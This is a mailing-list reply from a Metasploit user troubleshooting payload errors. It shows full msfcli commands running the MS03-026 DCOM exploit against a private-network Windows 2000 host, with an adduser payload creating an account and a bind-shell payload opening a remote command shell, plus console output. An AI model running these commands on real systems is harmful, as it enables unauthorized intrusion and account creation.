Re: windows/exec Payload problems.

[a10n3.s7r1k3r at gmail.com (Kashif Iftikhar)]

Here is some additional info.

I get the same error when I use the payload windows/adduser but the
user gets added even after getting the error.

Also, if I terminate the windows session by typing "exit" in windows
shell, I seem to be able to exploit the same box again in MSF3. So the
repeated exploiting problem is resolved but the payload issue still
remains.

Here is the sample output.

***********************************************************************************
root at S7R1K3R:/pentest/exploits/framework-3.0-beta-3$ ./msfcli
"exploit/windows/dcerpc/ms03_026_dcom" PAYLOAD="windows/adduser"
RHOST="192.168.0.17" USER="kkj1" PASS="kkj1" E
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135]
...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135]
...
[*] Sending exploit ...
Exploit failed: end of file reached
Backtrace:
./lib/rex/io/stream.rb:58:in `sysread'
./lib/rex/io/stream.rb:58:in `read'
./lib/rex/io/stream.rb:181:in `get_once'
./lib/rex/proto/dcerpc/client.rb:150:in `read'
./lib/rex/proto/dcerpc/client.rb:230:in `call'
./lib/msf/core/exploit/dcerpc.rb:97:in `dcerpc_call'
/pentest/exploits/framework-3.0-beta-3/modules/exploits/windows/dcerpc/ms03_026_dcom.rb:206:in
`exploit'
./lib/msf/core/exploit_driver.rb:189:in `job_run_proc'
./lib/msf/core/exploit_driver.rb:152:in `run'
./lib/msf/base/simple/exploit.rb:118:in `exploit_simple'
./lib/msf/base/simple/exploit.rb:127:in `exploit_simple'
./msfcli:153

root at S7R1K3R:/pentest/exploits/framework-3.0-beta-3$ ./msfcli
"exploit/windows/dcerpc/ms03_026_dcom"
PAYLOAD="windows/shell/bind_tcp" RHOST="192.168.0.17" E
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135]
...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135]
...
[*] Sending exploit ...
[*] Sending stage (474 bytes)
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (192.168.0.21:41500 -> 192.168.0.17:4444)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    IUSR_COMPULIFE
IWAM_COMPULIFE           kkj                      kkj1
The command completed with one or more errors.


C:\WINNT\system32>exit
exit

Abort session 1? [y/N]  y
********************************************************************************